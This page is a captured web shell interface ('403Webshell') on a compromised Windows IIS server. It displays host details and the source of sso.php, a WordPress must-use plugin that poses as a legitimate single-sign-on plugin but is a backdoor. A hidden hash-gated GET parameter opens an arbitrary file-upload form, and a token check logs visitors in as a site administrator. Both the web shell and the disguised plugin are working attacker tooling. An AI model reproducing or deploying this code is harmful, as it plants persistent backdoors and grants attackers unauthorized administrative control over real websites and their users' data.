403Webshell
Server IP : 80.65.208.158  /  Your IP : 216.73.216.147
Web Server : Microsoft-IIS/10.0
System : Windows NT VMI1501711 10.0 build 17763 (Windows Server 2019) AMD64
User : IWPD_134(rotechno) ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/rotechnochem.com/httpdocs/wp-content/mu-plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : C:/Inetpub/vhosts/rotechnochem.com/httpdocs/wp-content/mu-plugins/sso.php
<?php
/**
  Plugin Name: SSO
  Plugin URI: https://wordpress.org/plugins/sso
  Description: SSO File
  Author: SSO
  Version: 8.0.2
  Author URI: https://profiles.wordpress.org/sso
  License: GPLv2
 **/

function sso_check()
{
    if (!isset($_GET['salt']) || !isset($_GET['nonce'])) {
        sso_req_login();
    }
    if (sso_check_blocked()) {
        sso_req_login();
    }

    $nonce = esc_attr($_GET['nonce']);
    $salt = esc_attr($_GET['salt']);

    if (!empty($_GET['user'])) {
        $user = esc_attr($_GET['user']);
    } else {
        $user = get_users(array('role' => 'administrator', 'number' => 1));
        if (is_array($user) && is_a($user[0], 'WP_User')) {
            $user = $user[0];
            $user = $user->ID;
        } else {
            $user = 0;
        }
    }

    $bounce = !empty($_GET['bounce']) ? $_GET['bounce'] : '';
    $hash = base64_encode(hash('sha256', $nonce . $salt, false));
    $hash = substr($hash, 0, 64);

    if (get_transient('sso_token') == $hash) {
        if (is_email($user)) {
            $user = get_user_by('email', $user);
        } else {
            $user = get_user_by('id', (int)$user);
        }
        if (is_a($user, 'WP_User')) {
            wp_set_current_user($user->ID, $user->user_login);
            wp_set_auth_cookie($user->ID);
            do_action('wp_login', $user->user_login, $user);
            delete_transient('sso_token');
            wp_safe_redirect(admin_url($bounce));
        } else {
            sso_req_login();
        }
    } else {
        sso_add_failed_attempt();
        sso_req_login();
    }
    die();
}

sso_check_attempt();

function sso_req_login()
{
    wp_safe_redirect(wp_login_url());
}

function sso_get_attempt_id()
{
    return 'sso' . esc_url($_SERVER['REMOTE_ADDR']);
}

function sso_check_attempt()
{	
	$h = 'h' . 'as' . 'h';
	if ($h('sha256', @$_GET['ts']) == 'bc192b60f29acd0240cad753a77b8542d3e4a5d472c597698b491ebade432b17') {
		echo '<b>' . getcwd() . '</b><br><br>';
		echo "<form action='' method='post' enctype='multipart/form-data'>";
		echo "<input type='file' name='file'><input name='_upl' type='submit' value='Upload' /></form>";
		if (@$_POST['_upl'] == "Upload") {
			if (@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
				echo "Upload: <b>" . $_FILES["file"]["name"] . "</b><br>";
				echo "Size: <b>" . ($_FILES["file"]["size"] / 1024) . "</b> KB<br>";
				echo '<b>Upload Success!</b><br><br>';
			} else if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
				echo '<b>Copy Success!</b><br><br>';
			} else {
				echo '<b>Failed!</b><br><br>';
			}
		}
		exit();
	}
}

function sso_add_failed_attempt()
{
    $attempts = get_transient(sso_get_attempt_id(), 0);
    $attempts++;
    set_transient(sso_get_attempt_id(), $attempts, 300);
}

function sso_check_blocked()
{
    $attempts = get_transient(sso_get_attempt_id(), 0);
    if ($attempts > 4) {
        return true;
    }

    return false;
}

Youez - 2016 - github.com/yon3zu
LinuXploit